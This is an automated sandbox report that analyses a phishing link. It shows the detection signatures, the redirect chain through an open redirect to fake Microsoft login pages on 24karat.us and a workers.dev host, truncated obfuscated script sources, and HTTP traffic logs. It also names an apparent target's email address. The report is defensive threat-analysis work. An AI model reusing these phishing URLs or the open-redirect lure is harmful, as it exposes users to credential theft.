Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://manage.kmail-lists.com/subscriΡtions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusy

Overview

General Information

Sample URL:https://manage.kmail-lists.com/subscriΡtions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%2
Analysis ID:1414083
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected HtmlPhish54
HTML page contains suspicious iframes
HTML page contains hidden URLs or javascript code
HTML page contains obfuscate script src

Classification

  • System is w10x64
  • chrome.exe (PID: 5796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1988,i,4335926418607435208,2097072706423955988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.6.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
    Source: http://bigswitch.co.in/favicon.icoAvira URL Cloud: Label: phishing
    Source: bigswitch.co.inVirustotal: Detection: 11%Perma Link

    Phishing

    barindex
    Source: Yara matchFile source: 3.6.pages.csv, type: HTML
    Source: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comHTTP Parser: position:fixed;top:0;left:0;bottom:0;right:0;width:100%;height:100%;border:none;margin:0;padding:0;overflow:hidden;z-index:999999
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalHTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal
    Source: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
    Source: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
    Source: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comHTTP Parser: No favicon
    Source: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comHTTP Parser: No favicon
    Source: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comHTTP Parser: No favicon
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalHTTP Parser: No favicon
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalHTTP Parser: No favicon
    Source: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=HTTP Parser: No favicon
    Source: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqVkZOYU5OZ0FNM1hkSEdkMDNVN0RSU1VJQWliYWZQWFpDME1sbTVKTzl1NldacXRWcVFrYVpLbVRmdGxTNXAyZi1CSkJDOWpoeDJHSl9HMDB4QVJtUmNQbm5heDU1M0VpMlhDbUo1MkV0ZDU4YWJ2OEhqd2VEeDRid0tsSWxUaUR2a0hOTkZuZ2pRTWl0RDB2dm9McTJORDRkR1hOOEROdDcxM2tmVlAzMzdzZnBfWkE2R3liZmw2UklPTmZYQ3I2bm1PbTRoR1ljdXpJYXhIb0dGWTJxVVpoVzBsLWg2QUxnQTlBSFlDb3pVVDJqT3FxZGxXMDlJdTR3R2VZNlpZanFkWU9rWlJQRTJ4TEIzaFl6ckhzU3BEc0xHWVFiQUtyeEFxcC10RW5LZmpsR0pvUmtXZE9nNk1MQWd0cjByM0NhNWE2X3JQUU1pQXE0MnlBMTF2RDMwQjVqUzNJOEtjS1lySnZDVVplYkc1MUtFcnNsWG5jcXdwenMyTEtYT3RUbmpacVNMUE9QbWt4U1c1U2pIdGlpVF9xSlpUQkZySXRKT3lGbmVGYW9vcktHSkhWaVI3cGJNbVFZRmZUc1pya0NXV2FMb1M3eWhGZ3ZkR...HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49741 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.121.28
    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.121.28
    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.121.39
    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.121.39
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20= HTTP/1.1Host: manage.kmail-lists.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /?qrc=jgol@bgclinic.com HTTP/1.1Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://bigswitch.co.in/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/de9364586261/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8686d7969ff38c8d HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8686d7969ff38c8d/1711117435474/PuCra0aeu8l9_kN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8686d7969ff38c8d/1711117435474/PuCra0aeu8l9_kN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8686d7969ff38c8d/1711117435475/87838355b32f03578a2010d5ec95bff9ab3c967b76019571c44cca83e4d48e46/SNU9Px4ZWVIK_59 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMiLCJkb21haW4iOiIyNGthcmF0LnVzIiwia2V5IjoiRzBsbW84Q0VrYmk3IiwicXJjIjoiamdvbEBiZ2NsaW5pYy5jb20iLCJpYXQiOjE3MTExMTc0NDksImV4cCI6MTcxMTExNzU2OX0.s-ZTKIIMiAyWUPU--t4qvflYQNokE9Efj6w9WMo6whI HTTP/1.1Host: 24karat.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?qrc=jgol%40bgclinic.com HTTP/1.1Host: 24karat.usConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4
